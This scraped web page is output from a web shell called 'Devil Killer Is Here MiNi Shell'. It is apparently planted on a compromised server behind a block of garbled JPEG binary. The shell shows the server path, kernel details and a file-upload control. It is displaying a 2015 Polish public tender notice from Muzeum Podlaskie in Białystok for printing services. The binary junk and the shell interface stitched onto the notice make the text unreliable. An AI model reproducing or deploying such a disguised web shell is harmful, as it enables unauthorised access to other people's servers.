JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150907/231472-N-2015.html

<p class="kh_header"><b>Białystok: Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, adiustacja tekstu (sprawdzenie pod względem językowym i gramatycznym), skład, druk albumów, książek, folderów, zaproszeń, pocztówek, kalendarzy, plakatów, kartonowego pokoju wraz z dostawą dla Muzeum Podlaskiego w Białymstoku w roku 2015.</b><br>
<b>Numer ogłoszenia: 231472 - 2015; data zamieszczenia: 07.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Podlaskie w Białymstoku , ul. Ratusz-Rynek Kościuszki 10, 15-426 Białystok, woj. podlaskie, tel. 085 7421473, 7421440.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> muzeum@muzeum.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucji kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, adiustacja tekstu (sprawdzenie pod względem językowym i gramatycznym), skład, druk albumów, książek, folderów, zaproszeń, pocztówek, kalendarzy, plakatów, kartonowego pokoju wraz z dostawą dla Muzeum Podlaskiego w Białymstoku w roku 2015..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I zamówienia.  
Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, adiustacja tekstu (sprawdzenie pod względem językowym i gramatycznym), skład, druk albumów i książek wraz z dostawą do siedziby Zamawiającego.

Albumy

1.Katalog ręczników ludowych gminy Bielsk Podlaski, format 300 x 270 cm (pion), środek obj. ok. 200 str. (+/- 10%), kreda mat. 150g, kolor 4+4, oprawa twarda szyta nićmi, oklejka 130g, kolor 4+0+folia matowa, wyklejka niezadrukowana, nakład 1000 egz., wydawnictwo posiada Nr ISBN
Termin realizacji: do 15.12.2015 r.
Termin przekazania materiałów: 15.10.2015 r

Zadanie realizowane w ramach projektu pn.Katalog ręczników ludowych gminy Bielsk Podlaski współfinansowanego ze środków  Ministra Kultury i Dziedzictwa Kulturowego  

2.	Album Krasnuszki wśród ikon raschożych, format 300 x 270 cm (pion), środek obj. ok. 60  str. (+/- 10%), kreda mat. 150g, kolor 4+4, oprawa twarda szyta nićmi, oklejka 130g, kolor  4+0+folia matowa, wyklejka niezadrukowana, nakład 500 egz., 
wydawnictwo posiada Nr ISBN 
Termin realizacji: do 30.11.2015 r.
Termin przekazania materiałów: do 30.09.2015 r.

Książki

1.	Książka Obiekty obrzędowe społeczności Pucharów Dzwonowatych z Supraśla w woj. podlaskim. Złożenie darów - przejęcie terenu czy integracja kulturowa  format A4, środek obj. 350 stron (+/- 10%), tekst dwujęzyczny w układzie dwukolumnowym, ryciny umieszczone w tekście papier offset 120g, kolor 4+4, oprawa twarda szyta nićmi, oklejka 130g, kolor 4+0+folia matowa, wyklejka niezadrukowana, nakład 400 egz., 
wydawnictwo posiada Nr ISBN
Termin realizacji: do 30.11.2015r.
Termin przekazania materiałów: 2 połowa października 2015r.

Zadanie realizowane w ramach projektu pt. Obiekty obrzędowe społeczności Pucharów Dzwonowatych z Supraśla w woj. podlaskim. Złożenie darów - przejęcie terenu czy integracja kulturowa, współfinansowanego ze środków Ministra Kultury i Dziedzictwa Narodowego.

Część II zamówienia.  
Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, skład, druk folderów, zaproszeń, pocztówek, kalendarzy, plakatów oraz kartonowego pokoju wraz z dostawą do siedziby Zamawiającego.

Foldery / składanki

1.	Folder Jan Paweł II w oczach dziecka, format 29,6 x 58,6 cm (składany na 4), 3 bigowania, kreda 200 g, kolor 4 + 4+lakier offsetowy, nakład  500 egz. 
Termin realizacji: do 15.10.2015r.
Termin przekazania materiałów: do 07.10.2015 r.

2.	Folder reklamowy w formie mapy, format A2 składany na 10 części do formatu A5, bigowania, kreda 150g, kolor 4+4, folia mat., nakład 2.000 szt.
Muzeum dostarczy projekt gotowy do druku
Termin realizacji: do 15.10.2015r.
Termin przekazania materiałów: do 01.10.2015r.

Zaproszenia

1.	Zaproszenie, format A4 (składane do A5), 1 bigowanie, kreda mat. 250 g, kolor 4+4, nakład 500 szt. 
Muzeum dostarczy projekt gotowy do druku
Termin realizacji: do 30.10.2015 r.
Termin przekazania materiałów: do 01.10.2015r.
Zadanie realizowane w ramach projektu pn.Ręcznikowa draka dla uczniaka współfinansowanego ze środków   Ministra Kultury i Dziedzictwa Kulturowego  

Pocztówki / reprodukcje

1.	Komplet pocztówek w obwolucie, 5 pocztówek - format A5, kreda mat. 300 g, kolor 4+1+lakier offsetowy, obwoluta - format 3xA5, 4 bigi, kreda mat. 300 g, kolor 4+1+lakier offsetowy, tekst dwujęzyczny na obwolucie, nakład 400 kompletów ( 5 x 400 szt.)
Muzeum dostarczy projekt gotowy do druku
Termin realizacji: do 15.10.2015 r.
Termin przekazania materiałów: do 01.10.2015 r.

Plakaty / afisze / kalendarze

1.	Kalendarz, format 420x 295 mm (A2 składane na dwa do formatu A3), jedno bigowanie, poziom, 16 stron formatu A3, kreda 200g, kolor 4+4, szycie zeszytowe, na środku dłuższego boku otwór do zawieszenia, okładka, nakład 1000 szt.
Muzeum dostarczy projekt gotowy do druku
Termin realizacji: do 01.12.2015 r.
Termin przekazania materiałów: do 15.11.2015 r.
Zadanie realizowane w ramach projektu pn.Ręcznikowa draka dla uczniaka współfinansowanego ze środków   Ministra Kultury i Dziedzictwa Kulturowego  

2.	Plakat, format A3, kreda 180 g, kolor 4+0,  nakład 40 sztuk  
Muzeum dostarczy projekt gotowy do druku
Termin realizacji: do 15.10.2015 r.
Termin przekazania materiałów: do 05.10.2015 r.
Zadanie realizowane w ramach projektu pn. Ręcznikowa draka dla uczniaka współfinansowanego ze środków   Ministra Kultury i Dziedzictwa Kulturowego  

Inne
1.	W białostockim saloniku- kartonowy pokój dla lalek (do samodzielnego sklejania) 
Elementy do wydrukowania:
podłoga: szer. 23 cm, dł. 31 cm, karton 1,5 mm+oklejka po jednej stronie -  papier 80g (bez oklejki pod spodem podłogi), zadrukowany 4+0+folia matowa obustronnie 
ściany: (wg załączonego zdjęcia do SIWZ) wys. 23 cm + 2 cm wypustka do sklejania, szer. 77 cm, 2 bigowania oddzielające powierzchnie ścian + bigowanie oddzielające wypustki do sklejania, karton 1,5 mm+oklejka ubustronnie -  papier 80g, zadrukowany 4+0+folia matowa obustronnie 
Dwie karty o wymiarach 25 x 33 cm z rysunkami przedmiotów i postaci do wyciskania, każdy rysunek z dodatkową powierzchnią do przyklejenia na podłodze, odznaczoną bigowaniem (łącznie 22 rysunki na dwóch kartach), karton 1 mm, oklejka po jednej stronie (bez oklejki pod spodem), papier 80g, zadrukowany 4+0+foilia matowa obustronnie  
Nakład 3.000 egz.
Termin realizacji -  do 02.11.2015 r. 
Termin przekazania materiałów: do 01.10.2015 r.

	(CPV) 78220000-5 	Usługi składu 
	(CPV) 78225000-0 	Usługi projektów graficznych 
	(CPV) 78200000-9 	Usługi związane z drukowaniem 
	(CPV) 78210000-1 	Usługi w zakresie drukowania wydawnictw książkowych 
             (CPV) 78124000-2        Usługi w zakresie drukowania folderów 

3.	Wykonawca zobowiązany jest po podpisaniu umowy przedstawić Zamawiającemu do akceptacji projekt graficzny i skład komputerowy każdego z elementów wykonywanego zamówienia w formie elektronicznej.   
4.	Wykonawca zobowiązany będzie na żądanie Zamawiającego przedstawić wydruki próbne i dostarczać je do ostatecznej korekty i akceptacji do siedziby Zamawiającego przed zrealizowaniem każdego z elementów przedmiotu zamówienia.  
5.	Przedstawicielem Zamawiającego w zakresie uzgodnień technicznych, w tym akceptacji wydruków próbnych jest pani Barbara Muszyńska  - Kierownik Działu Promocji Wystaw i Wydawnictw Muzeum Podlaskiego w Białymstoku tel. 085 740-77-41 , 509-337-095
6.	Wykonawca zobowiązany będzie do wykonania każdego z elementów zamówienia w terminie uzgodnionym przez strony, nie dłuższym niż wskazanym w SIWZ. 
7.	Wykonawca po wykonaniu poszczególnych elementów zamówienia przekazuje je Zamawiającemu tj. dostarcza na własny koszt do siedziby Zamawiającego, przekazuje Zamawiającemu majątkowe prawa autorskie do zaakceptowanych projektów oraz przekazuje projekt każdej z części przedmiotu zamówienia w formie przygotowanej do druku na nośniku cyfrowym.  
8.	Zamawiający dostarczy Wykonawcy materiały tekstowe i fotograficzne w formie elektronicznej. Do części wydawnictw Zamawiający przekaże gotowe projekty, co zaznaczone jest w opisie przedmiotu zamówienia. 
9.	Zamawiający każdorazowo w formie elektronicznej poda terminu wykonania i inne konieczne dane do wykonania poszczególnych części przedmiotu zamówienia.
10.	Zamawiający zastrzega sobie prawo kontroli losowo wybranej realizowanej usługi poligraficznej w trakcie realizacji przedmiotu umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 78.20.00.00-9, 78.22.00.00-5, 78.22.50.00-0, 78.21.00.00-1, 78.12.40.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę  w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust.1 Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca należycie wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia przez niego działalności jest krótszy - w tym okresie minimum dwie  usługi odpowiadające swoim rodzajem  usługom stanowiącym przedmiot zamówienia na który składana jest oferta z podaniem ich wartości nie mniejszej niż:  
I część zamówienia: 40.000,00 zł brutto 
II część zamówienia:  40.000,00 zł brutto  
Zamawiający wymaga dołączenia do oferty wydawnictw o parametrach podobnych do podanych w SIWZ:
do I części zamówienia - co najmniej 2 wydawnictwa, 
do II części zamówienia - co najmniej 1 szt. plakat, 1 szt. zaproszenia,  1 szt. kalendarz, 1 szt. pocztówka bądź innego wydawnictwa o równoważnych parametrach zamówienia wskazanym w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę  w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust.1 Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę  w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust.1 Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę  w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust.1 Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony zgodnie z treścią i podpisany formularz Oferta, stanowiący Załącznik  Nr 1  do SIWZ  wraz z załącznikiem nr 1 do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.wrotapodlasia.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Podlaskie w Białymstoku
Ratusz, Rynek Kościuszki 10
15-426 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2015 godzina 10:00, miejsce: Muzeum Podlaskie w Białymstoku
Ratusz, Rynek Kościuszki 10
15-426 Białystok
(Dział AG).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Część wydruków współfinansowana jest ze środków Ministra Kultury i Dziedzictwa Narodowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, adiustacja tekstu (sprawdzenie pod względem językowym i gramatycznym), skład, druk albumów i książek wraz z dostawą do siedziby Zamawiającego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Albumy

1.	Katalog ręczników ludowych gminy Bielsk Podlaski, format 300 x 270 cm (pion), środek obj. ok. 200 str. (+/- 10%), kreda mat. 150g, kolor 4+4, oprawa twarda szyta nićmi, oklejka 130g, kolor 4+0+folia matowa, wyklejka niezadrukowana, nakład 1000 egz., wydawnictwo posiada Nr ISBN
Termin realizacji: do 15.12.2015 r.
Termin przekazania materiałów: 15.10.2015 r

Zadanie realizowane w ramach projektu pn.Katalog ręczników ludowych gminy Bielsk Podlaski współfinansowanego ze środków  Ministra Kultury i Dziedzictwa Kulturowego  

2.	Album Krasnuszki wśród ikon raschożych, format 300 x 270 cm (pion), środek obj. ok. 60  str. (+/- 10%), kreda mat. 150g, kolor 4+4, oprawa twarda szyta nićmi, oklejka 130g, kolor  4+0+folia matowa, wyklejka niezadrukowana, nakład 500 egz., 
wydawnictwo posiada Nr ISBN 
Termin realizacji: do 30.11.2015 r.
Termin przekazania materiałów: do 30.09.2015 r.

Książki

1.	Książka Obiekty obrzędowe społeczności Pucharów Dzwonowatych z Supraśla w woj. podlaskim. Złożenie darów - przejęcie terenu czy integracja kulturowa? format A4, środek obj. 350 stron (+/- 10%), tekst dwujęzyczny w układzie dwukolumnowym, ryciny umieszczone w tekście papier offset 120g, kolor 4+4, oprawa twarda szyta nićmi, oklejka 130g, kolor 4+0+folia matowa, wyklejka niezadrukowana, nakład 400 egz., 
wydawnictwo posiada Nr ISBN
Termin realizacji: do 30.11.2015r.
Termin przekazania materiałów: 2 połowa października 2015r.

Zadanie realizowane w ramach projektu pt. Obiekty obrzędowe społeczności Pucharów Dzwonowatych z Supraśla w woj. podlaskim. Złożenie darów - przejęcie terenu czy integracja kulturowa?, współfinansowanego ze środków Ministra Kultury i Dziedzictwa Narodowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 78.20.00.00-9, 78.22.00.00-5, 78.22.50.00-0, 78.21.00.00-1, 78.12.40.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, skład, druk folderów, zaproszeń, pocztówek, kalendarzy, plakatów oraz kartonowego pokoju wraz z dostawą do siedziby Zamawiającego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Foldery / składanki

1.	Folder Jan Paweł II w oczach dziecka, format 29,6 x 58,6 cm (składany na 4), 3 bigowania, kreda 200 g, kolor 4 + 4+lakier offsetowy, nakład  500 egz. 
Termin realizacji: do 15.10.2015r.
Termin przekazania materiałów: do 07.10.2015 r.

2.	Folder reklamowy w formie mapy, format A2 składany na 10 części do formatu A5, bigowania, kreda 150g, kolor 4+4, folia mat., nakład 2.000 szt.
Muzeum dostarczy projekt gotowy do druku
Termin realizacji: do 15.10.2015r.
Termin przekazania materiałów: do 01.10.2015r.

Zaproszenia

1.	Zaproszenie, format A4 (składane do A5), 1 bigowanie, kreda mat. 250 g, kolor 4+4, nakład 500 szt. 
Muzeum dostarczy projekt gotowy do druku
Termin realizacji: do 30.10.2015 r.
Termin przekazania materiałów: do 01.10.2015r.
